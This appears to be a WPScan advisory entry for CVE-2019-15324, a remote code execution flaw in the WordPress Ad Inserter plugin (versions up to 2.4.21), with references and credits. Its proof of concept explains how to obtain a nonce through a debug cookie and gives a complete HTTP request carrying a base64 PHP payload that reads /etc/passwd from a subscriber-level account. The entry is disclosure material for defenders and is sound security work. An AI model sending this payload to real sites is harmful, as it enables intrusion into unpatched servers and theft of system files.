Ad Inserter <= 2.4.21 - Authenticated Remote Code Execution



Proof of Concept
The nonce (ai_check in the final request) can be obtained by querying the homepage with the AI_WP_DEBUGGING cookie set to 2.

Then, use an account with a role as low as subscriber to perform the request (payload below in the code parameter is base64 encoded for <?php echo file_get_contents('/etc/passwd'); ?>:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wp-admin/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
Origin: http://127.0.0.1
Connection: close
Cookie: [SNIPPED]
Upgrade-Insecure-Requests: 1

action=ai_ajax_backend&preview=1&ai_check=[SNIPPED]&code=PD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygnL2V0Yy9wYXNzd2QnKTsgPz4%3D&php=1

Affects Plugin

References

CVE 2019-15324
URL https://www.wordfence.com/blog/2019/07/critical-vulnerability-patched-in-ad-inserter-plugin/
URL https://plugins.trac.wordpress.org/changeset/2122577/ad-inserter

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Original Researcher Sean Murphy (Wordfence)
Submitter Ryan Dewhurst
Submitter Website https://wpscan.io
Submitter Twitter ethicalhack3r
Views 4068
Verified No
WPVDB ID 9455

Timeline

Publicly Published 2019-07-15 (5 months ago)
Added 2019-07-15 (5 months ago)
Last Updated 2019-11-28 (16 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin